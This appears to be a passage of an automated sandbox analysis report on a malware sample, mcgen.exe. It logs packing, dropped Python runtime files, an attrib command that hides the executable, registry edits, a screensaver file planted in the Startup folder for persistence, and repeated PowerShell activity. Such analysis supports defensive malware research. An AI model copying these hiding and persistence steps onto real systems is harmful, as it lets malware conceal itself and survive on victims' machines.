              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1

              Persistence and Installation Behavior

              barindex
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: "C:\Users\user\Desktop\mcgen.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\mcgen.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Users\user\Desktop\mcgen.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32122\VCRUNTIME140.dllJump to dropped file
              Source: C:\Users\user\Desktop\mcgen.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32122\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\mcgen.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32122\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\mcgen.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32122\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\mcgen.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32122\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\mcgen.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32122\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\mcgen.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32122\libssl-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\mcgen.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32122\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\mcgen.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.dllJump to dropped file
              Source: C:\Users\user\Desktop\mcgen.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32122\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\mcgen.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32122\sqlite3.dllJump to dropped file
              Source: C:\Users\user\Desktop\mcgen.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32122\libcrypto-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\mcgen.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32122\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\mcgen.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32122\libffi-8.dllJump to dropped file
              Source: C:\Users\user\Desktop\mcgen.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32122\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\mcgen.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32122\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\mcgen.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32122\python313.dllJump to dropped file
              Source: C:\Users\user\Desktop\mcgen.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32122\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\mcgen.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scrJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scrJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F15820 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF6B9F15820
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
